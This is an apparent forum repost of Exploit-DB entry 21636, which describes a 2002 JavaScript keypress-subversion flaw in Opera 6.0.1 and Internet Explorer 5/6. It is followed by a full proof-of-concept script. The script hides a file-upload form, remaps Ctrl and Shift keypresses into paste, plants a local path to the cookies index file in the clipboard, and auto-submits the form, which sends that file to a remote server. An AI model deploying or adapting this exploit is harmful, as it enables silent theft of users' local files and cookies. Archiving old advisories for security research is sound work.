Exploit Opera 6.0.1 / Microsoft Internet Explorer 5/6 - JavaScript Modifier Keypress Event Subversion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21636
Проверка EDB
  1. Пройдено
Автор
ANDREAS SANDBLAD
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2002-2312
Дата публикации
2002-07-23
Код:
source: https://www.securityfocus.com/bid/5290/info

An issue has been reported with the JavaScript implementation of multiple web browsers, including Microsoft Internet Explorer and Opera. Malicious JavaScript may subvert some keypress events, with consequences including the disclosure of arbitrary local files to a remote server.

Through JavaScript, it is possible to define an event handler for the 'onkeydown' event, which fires when a key is pressed by the end user. Malicious script code may subvert this event to an arbitrary Ctrl-key combination, including events such as Paste. By further modifying the environment, it is possible to paste arbitrary content into a file upload form field.

This form may also be submitted by the malicious script, disclosing arbitrary local file contents to a remote server.

Other attacks based on script interaction with the cut and paste functionality of Windows may also be possible.

<div id=h style="zoom:0.0001">
<form name=u enctype="multipart/form-data" method=post action=upload.php>
<input type=file name=file></form></div>
<script>
//uploadFile="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat";
uploadFile="..\\Cookies\\index.dat";
function gotKey(){
if (event.ctrlKey)
event.keyCode = 86;
else if (event.shiftKey)
event.keyCode = 45;
else
return;
document.onkeydown = null;
window.clipboardData.setData("Text",uploadFile);
(p=document.forms.u.file).focus();
p.onpropertychange = function(){document.forms.u.submit()};
} document.onkeydown = gotKey;
window.onload=function(){document.body.focus()};
</script>
 
Источник
www.exploit-db.com

Похожие темы